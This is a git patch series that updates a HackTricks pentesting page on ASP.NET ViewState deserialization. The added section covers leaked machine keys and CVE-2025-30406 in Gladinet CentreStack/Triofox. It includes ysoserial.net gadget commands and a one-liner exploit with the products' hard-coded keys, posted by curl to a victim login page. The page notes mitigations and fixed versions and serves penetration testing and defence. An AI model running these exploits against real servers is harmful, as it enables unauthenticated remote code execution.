From 1018f5af23883ff1a737d65c5ad98b69bd985945 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 6 Aug 2025 01:46:06 +0000 Subject: [PATCH 1/2] Add content from: Research Update: Enhanced src/pentesting-web/deserialization... --- .../exploiting-__viewstate-parameter.md | 49 ++++++++++++++++++- 1 file changed, 48 insertions(+), 1 deletion(-) diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index e7020f2a5..b7867cf9b 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -237,8 +237,56 @@ curl "http://victim/page.aspx?__VIEWSTATE=" This **key-exfiltration primitive** was mass-exploited against on-prem SharePoint servers in 2025 ("ToolShell" – CVE-2025-53770/53771), but it is applicable to any ASP.NET application where an attacker can run server-side code. +## 2024-2025 Real-world Exploitation Scenarios and Hard-coded Machine Keys + +### Microsoft “publicly disclosed machine keys” wave (Dec 2024 – Feb 2025) +Microsoft Threat Intelligence reported mass exploitation of ASP.NET sites where the *machineKey* had previously been leaked on public sources (GitHub gists, blog posts, paste sites). Adversaries enumerated these keys and generated valid `__VIEWSTATE` gadgets with the newer `ysoserial.net` 1.41 `--minify` and `--islegacy` flags to evade WAF length limits: + +```bash +ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \ + --validationkey= --validationalg=SHA1 \ + --decryptionkey= --decryptionalg=AES \ + --generator= --minify +``` + +Rotating static keys or switching to *AutoGenerate* keys in Web .config (``) mitigates this class of attacks. {{#ref}} + +{{#endref}} + +### CVE-2025-30406 – Gladinet CentreStack / Triofox hard-coded keys +Kudelski Security uncovered that multiple CentreStack / Triofox releases shipped with identical `machineKey` values, enabling unauthenticated remote code execution through ViewState forgery (CVE-2025-30406). + +One-liner exploit: + +```bash +ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \ + --validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \ + --validationalg=SHA1 \ + --decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \ + --decryptionalg=AES --generator=24D41AAB --minify \ + | curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx +``` + +Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. {{#ref}} + + +{{#endref}} + ## References +- [Exploiting ViewState deserialization using Blacklist3r and YSoSerial.NET](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) +- [Deep dive into .NET ViewState deserialization and its exploitation](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) +- [Exploiting deserialisation in ASP.NET via ViewState (Soroush Dalili, 2019)](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) +- [Introducing badsecrets – fast machineKey discovery](https://blog.blacklanternsecurity.com/p/introducing-badsecrets) +- [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/) +- [Microsoft Security – Code injection attacks abusing publicly disclosed ASP.NET machine keys (Feb 6 2025)](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/) +- [Kudelski Security advisory – Gladinet CentreStack / Triofox RCE CVE-2025-30406 (Apr 16 2025)](https://research.kudelskisecurity.com/2025/04/16/gladinet-centrestack-and-gladinet-triofox-critical-rce-cve-2025-30406/) + + + + + + - [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) - [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) - [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) @@ -250,4 +298,3 @@ This **key-exfiltration primitive** was mass-exploited against on-prem SharePoin {{#include ../../banners/hacktricks-training.md}} - From b22c60801c63e5c9e2951e1aace04bf56348b5b1 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sun, 10 Aug 2025 14:29:54 +0200 Subject: [PATCH 2/2] Update exploiting-__viewstate-parameter.md --- .../deserialization/exploiting-__viewstate-parameter.md | 6 ------ 1 file changed, 6 deletions(-) diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index b7867cf9b..1d2efe9e0 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -281,12 +281,6 @@ Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or - [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/) - [Microsoft Security – Code injection attacks abusing publicly disclosed ASP.NET machine keys (Feb 6 2025)](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/) - [Kudelski Security advisory – Gladinet CentreStack / Triofox RCE CVE-2025-30406 (Apr 16 2025)](https://research.kudelskisecurity.com/2025/04/16/gladinet-centrestack-and-gladinet-triofox-critical-rce-cve-2025-30406/) - - - - - - - [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) - [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) - [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)